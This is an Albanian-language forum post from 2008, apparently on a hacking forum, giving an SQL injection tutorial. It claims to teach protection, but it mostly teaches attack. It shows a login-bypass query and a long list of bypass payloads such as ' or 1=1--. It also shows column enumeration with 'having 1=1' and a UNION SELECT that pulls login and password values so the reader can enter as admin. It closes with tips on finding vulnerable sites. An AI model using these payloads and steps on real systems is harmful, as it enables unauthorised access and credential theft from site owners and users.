tc-crew.darkbb.com
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Sql Injection

Shko poshtė

Sql Injection Empty Sql Injection

Mesazh  3gp' Wed Nov 26, 2008 12:30 pm

Kodi:
1? Intro
2? sql injection ?
3? Shembull sql inj 01
4? Emrat e te gjithave kampeve te pranishme
5? Si ti marrim informacionet
6? Si ta kerrkoj nje sql inj ?

_________________________________________________________________________



1) Intro

Te nderuar antar, tani ketu do tju tregoj se si te mbrohemi nga sql injection...
para te gjithave do tju tregojm se cka eshte nje sql injection..
ateher do te kalojm ne disa shembuj baze..
Buona lettura..

2) sql injection ?

Tani do tua jap nje spjegim shpejt e shpejt per sql injection...Ateher..
Per sql injection themi se eshte nje kalim i kodit sql qe nuk eshte i parapam
pej atij qe ka krijuar scriptin para atyj...
Zakonisht sql injection eshte e lejuashme prej grabimeve te kodeve...
qe mundesojn ekzekutimin e kodeve sql..
( sql injection e ashtu quajtura | injecioni i sql | )

3) Shembull Baze

Ateher si keni mire kuptuar qe sql injectio eshte armiku i php, asp, etj...
tani dote filloj te tregoj disa shembuj bazik..
Tani imagjinoni dy kampe (combo box)ku duhet futur username & password ne qoft
se scripti eshte jo i sigurt secili nga antaret mund te fus cfaredo
instukcioni sql.. do te shkruajm thjesht [ ' ] ose me mire apostrofin..
shikoni 2 shembuj te thiesht..
e para eshte ajo normale..( $sql )

SELECT * FROM user WHERE username= 'phpBB' AND password= 'shembull'

Gjersa kjo eshte ajo e " modifikuar "

SELECT * FROM user WHERE username= 'phpBB' OR 1=1--' AND password= 'shembull'

do te thot se pa asnje problem..
do te kyci (logohi). ne faqen e mbrojtur..
ose do te hyni si admin...
=> kjo natyrisht nvaret prej scriptit

Shifni disa sql inj bazike te perdorura:

********************************************************************************************

Username: Admin
Passw: ' or ''='

' or '1'='1

' or 1=1--

" or 1=1--

or 1=1--

' or 'a'='a

" or "a"="a

') or ('a'='a

' or 'x'='x

' or 'x'='x

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

********************************************************************************************

4) Emri i gjitha kampeve prezent

Shikoni tani do tju tregoj se si ti kthejm
te gjith emrat e kampeve prezent...
Duhet te perdorim nje query si kjo ketu me poshte:

shembull:

SELECT * FROM Tabela_Juaj where USERID='' having 1=1

Se do te leshohet
do te shifni se serveri do tua kthej emrat e te gjithve
kampeve prezente ne tabel...


5) Si ti marrim informacionet

Ateher nje her mbas gjetjes se gjitha kampeve query
eshte leht te gjejm informacione te nevojshme :-D

shembull:

SELECT idutenti, login, Password from antari where login='
' union select 1,1,'cfare do vlere' from antari

kjo gjeneron nje gabim..
do te thot se jua kthen vleren kampeve login...

E njejta gje eshte edhe per password...
ne menyr qe mund te hyni si antari i zegjedhur nga ju..
si gjithmon eshte admini :-D


6) Si te gjejm nje sql inj ?

Shikoni !!
sikam shkruar me lart, si ta gjej nje sql inj ??
hmmm egzistojn menyra te ndryshme..
por me se pakti duhet te dim disa funkcione nga database MySQL
e natyrisht se cilin script doni te gjeni sql inj tuaj...
do te thot php, asp, etj..

Teknika me e shfrytezuar apo e perdor eshte te kontrollom kodin & e funkcionet e saj..
do te thot se eshte mire ta shkarkojm nje board ose nje guestbook..
te kapaciteteve te ulta
te ngarkoni ne ftp tuaj private
e te beni te gjitha provat e nevojshme..

Ose gjithashtu egzistojn software qe bejn gjithshka automatikisht, ose me mire
ju tregojn webin e bug-uar nga sql injection..
njeri nder me te miret ne cirkulim eshte "Acunetix Web Vulnerability Scanner "
edhe pse simbas mejet eshte me mire se te bejm ne gjithcka vecmas
sepse perndryshe nuk do te mesoni kurr gje...
e programi do te bej gjithcka vetem pa ju treguar arsyen dhe shkakun...
aeher ju rekomandoj te kuptoni mire para se te reagoni & ateher ndoshta
ta shfrytezoni kur keni pak kohe ose
kur do te keni nje njohur te avancuar ne kete kamp...
3gp'
3gp'
Webmaster
Webmaster

Numri i postimeve : 211
Join date : 18/05/2008
Age : 31

Mbrapsht nė krye Shko poshtė

Mbrapsht nė krye


 
Drejtat e ktij Forumit:
Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi